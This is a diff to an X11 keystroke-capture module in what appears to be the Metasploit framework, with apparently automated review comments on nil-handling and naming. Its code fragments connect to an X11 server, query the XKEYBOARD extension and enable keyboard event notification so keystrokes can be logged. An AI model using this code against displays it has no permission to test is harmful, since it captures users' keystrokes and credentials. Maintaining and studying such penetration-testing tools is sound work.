diff --git a/documentation/modules/auxiliary/gather/x11_keyboard_spy.md b/documentation/modules/auxiliary/gather/x11_keyboard_spy.md index f545f665d1a8..c6a52cf9e5ec 100644 --- a/documentation/modules/auxiliary/gather/x11_keyboard_spy.md +++ b/documentation/modules/auxiliary/gather/x11_keyboard_spy.md @@ -126,7 +126,7 @@ msf6 auxiliary(gather/x11_keyboard_spy) > run [*] 127.0.0.1:6000 - Establishing TCP Connection [*] 127.0.0.1:6000 - [1/9] Establishing X11 connection -[-] 127.0.0.1:6000 - Connection packet malfored (size: 8192), attempting to get read more data +[-] 127.0.0.1:6000 - Connection packet malformed (size: 8192), attempting to get read more data [+] 127.0.0.1:6000 - Successfully established X11 connection [*] 127.0.0.1:6000 - Version: 11.0 [*] 127.0.0.1:6000 - Screen Resolution: 958x832 diff --git a/lib/msf/core/exploit/remote/x11/extension.rb b/lib/msf/core/exploit/remote/x11/extension.rb index 460770cf34e5..ae93c51aabd8 100644 --- a/lib/msf/core/exploit/remote/x11/extension.rb +++ b/lib/msf/core/exploit/remote/x11/extension.rb @@ -16,8 +16,8 @@ def query_extension(extension_name, call_count) result = nil begin packet = sock.timed_read(X11QueryExtensionResponse.new.num_bytes) - # leaving here, good for debugging - packet.bytes.map { |b| '\\x' + b.to_s(16).rjust(2, '0') }.join + # for debugging, print the following line + # puts packet.bytes.map { |b| '\\x' + b.to_s(16).rjust(2, '0') }.join result = X11QueryExtensionResponse.read(packet) rescue StandardError => e vprint_bad("Error (#{e}) processing data: #{packet.bytes.map { |b| %(\\x) + b.to_s(16).rjust(2, '0') }.join}") diff --git a/lib/rex/proto/x11/window.rb b/lib/rex/proto/x11/window.rb index a789ad572a00..c4a04ed7fd5d 100644 --- a/lib/rex/proto/x11/window.rb +++ b/lib/rex/proto/x11/window.rb 
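Review bot: The rescue clause on the hunk's last line dereferences `packet.bytes` even when `packet` is still `nil`, which is the case whenever `sock.timed_read` itself raised (or, if it can return nil on timeout, returned nil), so the error path raises NoMethodError instead of printing the diagnostic. Interpolating `packet.to_s.bytes` instead, `vprint_bad("Error (#{e}) processing data: #{packet.to_s.bytes.map { |b| %(\\x) + b.to_s(16).rjust(2, '0') }.join}")`, keeps the original dump for real packets and prints an empty one otherwise. The new debugging comment suggests a bare `puts`; `vprint_status` would keep the dump on the module's normal output path and behind its verbose flag. query_extension's body continues outside the hunk, so only this rescue clause is visible.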
@@ -217,8 +217,8 @@ def initialize(width, height, image_data, color_data) @color_data = color_data # from X11GetColorsResponse end - self.from_replies(width, height, image_reply, color_reply) - self.new(width, height, image_reply.image_data, color_reply.colors) + def self.from_replies(width, height, image_reply, color_reply) + new(width, height, image_reply.image_data, color_reply.colors) end def create_image diff --git a/modules/auxiliary/gather/x11_keyboard_spy.rb b/modules/auxiliary/gather/x11_keyboard_spy.rb index 845ec4af120a..e0d25d1237f2 100644 --- a/modules/auxiliary/gather/x11_keyboard_spy.rb +++ b/modules/auxiliary/gather/x11_keyboard_spy.rb @@ -87,7 +87,7 @@ def build_sym_key_map(map_data) if syms.n_syms == 0 key_map[key_code] = nil else - sym = map_data.key_map_array[keysym_index].key_sym_array[0].syms + sym = map_data.key_map_array[keysym_index].key_sym_array[0] begin character = sym.chr character = '[space]' if character == ' ' @@ -129,7 +129,7 @@ def translate_keystroke(bit_array_of_keystrokes, key_map, last_key_press_array) end def run - query_extension_calls = 0 + query_extension_call_counter = 0 @keylogger_log = '' @keylogger_print_buffer = '' @@ -147,7 +147,7 @@ def run end vprint_status('[2/9] Checking on BIG-REQUESTS extension') - big_requests_plugin = query_extension('BIG-REQUESTS', query_extension_calls) + big_requests_plugin = query_extension('BIG-REQUESTS', query_extension_call_counter) fail_with(Msf::Module::Failure::UnexpectedReply, 'Unable to process response') if big_requests_plugin.nil? if big_requests_plugin.present == 1 print_good(" Extension BIG-REQUESTS is present with id #{big_requests_plugin.major_opcode}") 
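Review bot: The new `def self.from_replies(width, height, image_reply, color_reply)` carries no doc comment, and the reply types are only hinted at by the `# from X11GetColorsResponse` comment on the field above it. A short YARD header would help: a one-line purpose (builds a window from the image and color replies), `# @param color_reply [X11GetColorsResponse] its colors become the color table`, a hedged `@param image_reply` noting only that `image_data` is read from it (its class is not visible here), and `# @return [self]`. As written a nil reply fails with NoMethodError at `.image_data`/`.colors`; whether `initialize` (which starts above the hunk) validates its arguments cannot be seen from here. The enclosing class starts and ends outside the hunk.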
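Review bot: The guard `if syms.n_syms == 0` tests `syms`, but the changed line re-derives what looks like the same entry as `map_data.key_map_array[keysym_index].key_sym_array[0]`; if `syms` is that element (its assignment is above the hunk), `sym = syms.key_sym_array[0]` states the relationship directly and drops the repeated lookup. `key_sym_array[0]` is nil for an empty array, and the following `sym.chr` then raises NoMethodError; the `begin` that follows may rescue it, but its rescue clause is outside the hunk, so an explicit nil check before `.chr` would document the intent either way. build_sym_key_map's body continues outside the hunk.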
@@ -173,7 +173,7 @@ def run sock.put(gc_header.to_binary_s + gc_body.to_binary_s + gp_header.to_binary_s + - gp_body.to_binary_s) # not sure why we do this + gp_body.to_binary_s) # not sure why we also do a get property, but it emulates how the library works # nothing valuable in the response, just make sure we read it in to # confirm its expected data and not leave the response on the socket @@ -188,7 +188,7 @@ def run end vprint_status('[5/9] Checking on XKEYBOARD extension') - xkeyboard_plugin = query_extension('XKEYBOARD', query_extension_calls) + xkeyboard_plugin = query_extension('XKEYBOARD', query_extension_call_counter) fail_with(Msf::Module::Failure::UnexpectedReply, 'Unable to process response') if xkeyboard_plugin.nil? if xkeyboard_plugin.present == 1 print_good(" Extension XKEYBOARD is present with id #{xkeyboard_plugin.major_opcode}") 
@@ -205,24 +205,25 @@ def run full_key_types: 1, full_key_syms: 1, full_modifier_map: 1).to_binary_s) - data = sock.get_once(-1, 1) + map_raw_data = sock.get_once(-1, 1) + # for debugging packet output, uncomment following line # puts data.bytes.map { |b| "\\x" + b.to_s(16).rjust(2, '0') }.join - map_data = X11GetMapReply.read(data) + map_data = X11GetMapReply.read(map_raw_data) vprint_status('[8/9] Enabling notification on keyboard and map') sock.put(X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode, affect_which_new_keyboard_notify: 1, affect_new_keyboard_key_codes: 1, affect_new_keyboard_device_id: 1).to_binary_s + - X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode, - affect_which_map_notify: 1, - affect_map_key_types: 1, - affect_map_key_syms: 1, - affect_map_modifier_map: 1, - map_key_types: 1, - map_key_syms: 1, - map_modifier_map: 1).to_binary_s) # not sure what this does - sock.get_once(-1, 1) + X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode, + affect_which_map_notify: 1, + affect_map_key_types: 1, + affect_map_key_syms: 1, + affect_map_modifier_map: 1, + map_key_types: 1, + map_key_syms: 1, + map_modifier_map: 1).to_binary_s) # not sure what this does, but emulates x11 c library + # this request doesn't receive any response data vprint_status('[9/9] Creating local keyboard map') key_map = build_sym_key_map(map_data)
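Review bot: The debugging line kept as context, `# puts data.bytes.map { |b| "\\x" + b.to_s(16).rjust(2, '0') }.join`, still refers to `data`, which this hunk renames to `map_raw_data`, so following the new "uncomment following line" instruction would raise NameError; it should read `# puts map_raw_data.bytes.map { |b| "\\x" + b.to_s(16).rjust(2, '0') }.join`. The removed `sock.get_once(-1, 1)` after the two select-events requests was the only read draining the socket at that point; the replacement comment is right that a successful request returns no data, but an X11 error reply to it would now stay queued and be consumed by the next read, so stating that assumption, `# no reply on success; an X error for this request would surface on the next read`, keeps the trade-off visible. `map_raw_data = sock.get_once(-1, 1)` can also return nil on timeout, and `X11GetMapReply.read(map_raw_data)` then fails inside BinData rather than through the module's own `fail_with(..., 'Unable to process response')` path used for the extension queries. run's body continues outside the hunk.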